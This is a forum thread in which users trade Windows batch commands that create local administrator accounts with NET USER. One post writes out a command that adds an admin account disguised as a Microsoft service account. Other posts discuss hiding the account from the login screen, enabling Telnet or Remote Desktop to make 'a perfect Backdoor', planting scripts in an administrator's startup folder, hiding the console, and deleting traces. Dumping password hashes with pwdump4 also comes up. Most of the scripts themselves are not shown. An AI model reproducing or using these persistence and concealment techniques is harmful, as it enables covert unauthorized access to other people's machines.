Here is a Cool Script that will Create an Admin User in Local System with a CMD Commands.

User.cmd

If you Have any Suggestion to make it better , Post Here Your Ideas.

A suggestion - make it so that it pops up a question to ask the user what the password is.

Of course, since you say its open source, why not just say "You can create your own such file by typing this stuff into notepad and then saving it as blat.cmd (or blat.bat for that matter). If people want to know what its doing use "net help user" in any cmd window



As for comments, that password is very insecure and should never be used on an internet connected system , also, your bad copy/pasting means that you add a different user to the administrators group... woops.... bad boy!

Tnx for bad type, Link Updated.

We Have Working to Make it as a Tools.

About:
=======
User-CMD Tools is a simple Program that using NET USER commands to
Add , Delete Or Modify an Administrator User Account of Windows NT/2K,XP,2003.

From Net Help :
"NET USER creates and modifies user accounts on computers.
When used without switches, it lists the user accounts for the computer.
The user account information is stored in the user accounts database."

Options --- Are as follows:

Options Description
-----------------------------------------------------------------------

username Is the name of the user account to add, delete, modify, or
view. The name of the user account can have as many as
20 characters.
password Assigns or changes a password for the user's account.
A password must satisfy the minimum length set with the
/MINPWLEN option of the NET ACCOUNTS command.
It can have as many as 14 characters.

/ADD Adds a user account to the user accounts database.
/DELETE Removes a user account from the user accounts database.

/FULLNAME:"name" Is a user's full name (rather than a username).
Enclose the name in quotation marks.
/COMMENT:"text" Provides a descriptive comment about the
user's account. Enclose the text in
quotation marks.

/EXPIRES:{date | NEVER} Causes the account to expire if date is
set. NEVER sets no time limit on the
account. An expiration date is in the
form mm/dd/yy(yy). Months can be a number,
spelled out, or abbreviated with three
letters. Year can be two or four numbers.
Use slashes(/) (no spaces) to separate
parts of the date.

-----------------------------------------------------------------------------------------------

Freeman.

Note : The Tools will be Open Source.!

/Edit : www.HermanGroup.org

better code for xp this will create the account and make it not visible on the login screen


or if in a shell prompt one simple copy paste

of course you can also modify this to look like some microsoft added user account too

Will add it, NOT HIDE IT, and prompt for password.

Get the tools and give me more idea to add on it .!

Free UserCmd.!

Freeman.

thanx ...
next net share example !

why not just
net user IUSR_REMOTE herman /add /expires:never /comment:"Built-in account for Remote Service" /fullname:"Remote Service Account" &&
net localgroup administrators IUSR_REMOTE /add

Yeah, i made a simple batchfile that can do the same. Bit of a gui batch i did for making some acount on my home network for sharing, didn't want the acount to show on the loginscreen.

finalbeta your batch looks like nice thank u

You cant do that when you dont have admin acces already...

Cmd commands always work when you have admin access only

FiNaLBeTa , your Code like very nice.

yes, many interistng script, many thanks for that, I have learn funny commands

Hi m8's

Thx for the HIDE TIPP @ illwill.
And also a lot of thanks for the batch file from FiNaLBeTa.

Looks nice and i could lern something from it.

Thx.

Just combine it a script that enable Telnet or RemoteDesktop and you have a perfect Backdoor with just a batch file

Telnet


RemoteDesktop


Terminal Service


hope to usefull

well this can be useful if you dont have NTFS on a machine, put this in the admins startup dir, and whenever he logs in next you got a admin account too. But what about the big black box he sees at startup, may be make a vb prog with something like



And also add some code to delete both the files after this is done.

Is there a better way to hide the dos window?

Thanks for the batch file Rasraven.

Terminal Service & Remote desktop work Exactly, But Telnet Service Activate when System Restarted in XP windows.

rasraven: Your scripts seems to be cool but don't seems to work ...

Telnet:
"FailureActions"=hex
'#58' is not recognise as a cmd ... (smth like than)
'a' is not recognise ...

RemoteDesk & Termserv:
The batch processing is ok, but there don't seems to be activated ...
and i presume there is no space echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\TermService]>> c:\TS.reg

and in others cmd

Nice work on the batch files guys, learning allot from this

very interesting post
thx u all

i should say any .cmd/.bat is always open source. anyway thanks!

thanks for bat files

good work...

yeah , very very interesting

I've learned some very cool command

Thx to all for sharing your knowledge

yeah you may not be able to do it if you have admin rights but you can make a schedule to execute the batch file using the at command under windows xp then the system will call the script and well do anything you like. This is why task scheduler is so dangrous in windows becuase when it calls the task it runs the whatever as system prevliages not the user that created the task. In theory of course

this is indeed a very handy topic .....didnt knew all of it ... learnt some nice stuff here.....thx a bundle

NET_API_STATUS NetUserAdd(
LMSTR servername,
DWORD level,
LPBYTE buf,
LPDWORD parm_err
);

nuff said.

dunno why this is all necessary...

just use pwdump4 to get hashes and then crack the hashes... and bam you got the admin pass, so i don't know any reason why you should add an own user account

grtz

User-CMD Tools is a simple Program that using NET USER commands to
Add , Delete Or Modify an Administrator User Account of Windows NT/2K,XP,2003.

Every one can Download This from Herman Group site

very interesting, thx a lot for everybody

Does the task schedule even work if i'm in the login screen and haven't logged yet? Sorry, i don't know much of this.

That Terminal Server part probably won't work without cd, unless you arlrady have the file in place.

It works without asking for cd . I have tried it on few default xp proffessional machines and 3389 opens and um able to connect them .

Ok guys..I released the Delphi Cool Source code for it that make Excutable file and Compress it well.

www.hermangroup.org

Free User.CMD


I think it help to ya all for make your own tools and be a good tutorial .

Please continue to publish your codes here.

Thanks.

Freeman.

More Info : http://www.hermangroup.org/user-cmd.html

In the attack against domain controllers, you can creates the batch file USER2.CMD with the following contents:



Note:

In this scenario, in the attack against domain controllers, the domain under the attack is the forest root domain.

Well 1 thing to say none of this will work if you do not already have admin rights.
Lets say you are trying to gain admin locally it will not work if you dont already have. But if you already have it why not just Go add your self....

You guys are missing one thing. It doesn't work on local versions Nolimit way is better then